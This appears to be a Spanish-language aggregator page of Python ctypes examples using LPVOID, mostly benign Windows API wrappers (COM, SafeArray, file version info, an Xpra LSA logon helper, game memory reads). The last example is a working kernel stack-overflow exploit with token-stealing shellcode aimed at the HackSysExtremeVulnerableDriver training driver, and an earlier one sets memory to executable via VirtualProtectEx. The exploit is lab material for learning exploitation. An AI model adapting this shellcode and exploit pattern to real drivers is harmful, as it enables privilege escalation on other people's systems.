Ejemplos de LPVOID en Python

Ejemplo n.º 1

def get_lives(handle):
    """Reads number of lives from program memory"""
    if DEBUG and DEBUG_MEMORY:
        print("get_lives")
    buffer = wtypes.LPVOID(0)
    buffer, bytes_read = read_memory(handle, LIVES_ADDR, buffer,
                                     sizeof(c_uint32))
    return buffer.value

Ejemplo n.º 2

def get_score(handle):
    """Reads score from program memory"""
    if DEBUG and DEBUG_MEMORY:
        print("get_score")
    buffer = wtypes.LPVOID(0)
    buffer, bytes_read = read_memory(handle, SCORE_ADDR, buffer,
                                     sizeof(c_uint32))
    return buffer.value

Ejemplo n.º 3

Archivo: read_memorey_win_.py Proyecto: shad0w008/gjqt-script

def changeProtect():
    old_protection = w.DWORD(0)
    print({
        "VirtualProtectEx":
        k32.VirtualProtectEx(processHandle, w.LPVOID(address), 1, 0x40,
                             w.PDWORD(old_protection)),
        "last_error":
        k32.GetLastError()
    })

Ejemplo n.º 4

Archivo: input_handler.py Proyecto: sendnoose/socketthingy

def StartThread(function):
    func = LPTHREAD_START_ROUTINE(function)
    threadID = wintypes.DWORD()
    handle = wintypes.HANDLE(windll.kernel32.CreateThread(None, 0, func, wintypes.LPVOID(0), 0, ctypes.byref(threadID)))

    if handle:
        windll.kernel32.WaitForSingleObject(handle, 1)

    return handle, threadID

Ejemplo n.º 5

    def QueryInterface(self, riid):
        prototype = ctypes.WINFUNCTYPE(HRESULT, ctypes.POINTER(winapi.GUID),
                                       ctypes.POINTER(wintypes.LPVOID))

        paramflags = ((_In_, 'riid'), (_Out_, 'ppvObject',
                                       ctypes.pointer(wintypes.LPVOID(None))))

        _QueryInterface = prototype(IUnknown_QueryInterface_Idx,
                                    'QueryInterface', paramflags)
        _QueryInterface.errcheck = winapi.RAISE_NON_ZERO_ERR
        return_ptr = _QueryInterface(self.this, ctypes.byref(riid))
        return IUnknown(return_ptr.contents)

Ejemplo n.º 6

Archivo: winapi.py Proyecto: mmg1/cWMI

def SafeArrayAccessData(sa):
    prototype = ctypes.WINFUNCTYPE(HRESULT, ctypes.POINTER(SAFEARRAY),
                                   ctypes.POINTER(wintypes.LPVOID))

    paramflags = (
        (_In_, 'psa'),
        (_Out_, 'ppvData', ctypes.pointer(wintypes.LPVOID(None))),
    )

    _SafeArrayAccessData = prototype(('SafeArrayAccessData', oleaut32),
                                     paramflags)
    _SafeArrayAccessData.errcheck = RAISE_NON_ZERO_ERR
    return_obj = _SafeArrayAccessData(sa)
    return return_obj.contents

Ejemplo n.º 7

Archivo: win32.py Proyecto: alexsharoff/BuildMigrator

def GetFileVersionInfo(path):
    if isinstance(path, unicode):
        GetFileVersionInfoSize = __GetFileVersionInfoSizeW
        _GetFileVersionInfo = __GetFileVersionInfoW
        VerQueryValue = __VerQueryValueW
        VerQueryValueSubBlock1 = unicode(r"\VarFileInfo\Translation")
        VerQueryValueSubBlock2 = unicode(
            r"\StringFileInfo\%04x%04x\FileVersion")
        _string_at = wstring_at
    else:
        GetFileVersionInfoSize = __GetFileVersionInfoSizeA
        _GetFileVersionInfo = __GetFileVersionInfoA
        VerQueryValue = __VerQueryValueA
        VerQueryValueSubBlock1 = br"\VarFileInfo\Translation"
        VerQueryValueSubBlock2 = br"\StringFileInfo\%04x%04x\FileVersion"
        _string_at = string_at

    size = GetFileVersionInfoSize(path, None)
    if not size:
        return None

    data = create_string_buffer(size)
    success = _GetFileVersionInfo(path, 0, size, data)
    assert success

    buffer = wintypes.LPVOID()
    length = wintypes.UINT()
    success = VerQueryValue(data, VerQueryValueSubBlock1, buffer, length)
    if not success:
        return None

    codepage = tuple(array.array("H", string_at(buffer.value, length.value)))

    success = VerQueryValue(data, VerQueryValueSubBlock2 % codepage, buffer,
                            length)
    if not success:
        return None

    return _string_at(buffer.value, length.value - 1)

Ejemplo n.º 8

Archivo: lsa_logon_lib.py Proyecto: DiGuoZhiMeng/Xpra

def lsa_logon_user(auth_info,
                   local_groups=None,
                   origin_name=py_origin_name,
                   source_context=None,
                   auth_package=None,
                   logon_type=None,
                   lsa_handle=None):
    from xpra.log import Logger
    log = Logger("win32")
    log("lsa_logon_user%s",
        (auth_info, local_groups, origin_name, source_context, auth_package,
         logon_type, lsa_handle))
    if local_groups is None:
        plocal_groups = PTOKEN_GROUPS()
    else:
        plocal_groups = ctypes.byref(local_groups)
    if source_context is None:
        source_context = py_source_context
    if not isinstance(origin_name, bytes):
        origin_name = origin_name.encode('mbcs')
    buf = ctypes.create_string_buffer(origin_name)
    origin_name = STRING(len(origin_name), len(buf), buf)
    if auth_package is None:
        if isinstance(auth_info, MSV1_0_S4U_LOGON):
            auth_package = NEGOTIATE_PACKAGE_NAME
        elif isinstance(auth_info, KERB_S4U_LOGON):
            auth_package = MICROSOFT_KERBEROS_NAME
        else:
            auth_package = MSV1_0_PACKAGE_NAME
    if logon_type is None:
        if isinstance(auth_info, S4ULogon):
            logon_type = Batch
        else:
            logon_type = Interactive
    profile_buffer = wintypes.LPVOID()
    profile_buffer_length = wintypes.ULONG()
    profile = None
    logonid = LUID()
    htoken = HANDLE()
    quotas = QUOTA_LIMITS()
    substatus = NTSTATUS()
    deregister = False
    if lsa_handle is None:
        lsa_handle = lsa_connect_untrusted()
        deregister = True
    try:
        if isinstance(auth_package, (str, bytes)):
            auth_package = lsa_lookup_authentication_package(
                lsa_handle, auth_package)
        try:
            args = (lsa_handle, ctypes.byref(origin_name), logon_type,
                    auth_package, ctypes.byref(auth_info),
                    ctypes.sizeof(auth_info), plocal_groups,
                    ctypes.byref(source_context), ctypes.byref(profile_buffer),
                    ctypes.byref(profile_buffer_length), ctypes.byref(logonid),
                    ctypes.byref(htoken), ctypes.byref(quotas),
                    ctypes.byref(substatus))
            log("LsaLogonUser%s", args)
            secur32.LsaLogonUser(*args)
        except WindowsError:  #@UndefinedVariable
            if substatus.value:
                raise ctypes.WinError(substatus.to_error())
            raise
        finally:
            if profile_buffer:
                address = profile_buffer.value
                buftype = PROFILE_BUFFER_TYPE.from_address(address).value
                if buftype == MsV1_0InteractiveLogon:
                    profile = MSV1_0_INTERACTIVE_PROFILE.from_address_copy(
                        address, profile_buffer_length.value)
                secur32.LsaFreeReturnBuffer(address)
    finally:
        if deregister:
            secur32.LsaDeregisterLogonProcess(lsa_handle)
    return LOGONINFO(htoken, logonid, profile, quotas)

Ejemplo n.º 9

Archivo: scratch_ctypes.py Proyecto: hdbreaker/RicardoNarvaja_ExploitingWithIDAPRO_Desde0

FILE_SHARE_DELETE = 0x00000004
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
CREATE_NEW = 1
CREATE_ALWAYS = 2
OPEN_EXISTING = 3
OPEN_ALWAYS = 4
TRUNCATE_EXISTING = 5

shellcode="\x53\x56\x57\x60\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\xBA\x04\x00\x00\x00\x8B\x80\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x39\x90\xB4\x00\x00\x00\x75\xED\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\x61\x33\xC0\x83\xC4\x0C\x5D\xC2\x08\x00"

IOCTL_STACK=0x222027

hDevice = ctypes.windll.kernel32.CreateFileA(r"\\.\HackSysExtremeVulnerableDriver",GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING, 0, None )

print int(hDevice)

buf = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(0x824),ctypes.c_int(0x3000),ctypes.c_int(0x40))

data= shellcode+ ((0x828 -len(shellcode)) * "A") + struct.pack("<L",int(buf))+struct.pack("<L",0x0BAD0B0B0 )

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(buf),data,ctypes.c_int(len(data)))

bytes_returned = wintypes.DWORD(0)
h=wintypes.HANDLE(hDevice)
b=wintypes.LPVOID(buf)
ctypes.windll.kernel32.DeviceIoControl(h,IOCTL_STACK, b, -1, None, 0, ctypes.pointer(bytes_returned),0)

ctypes.windll.kernel32.CloseHandle(hDevice)
os.system("calc.exe")
raw_input()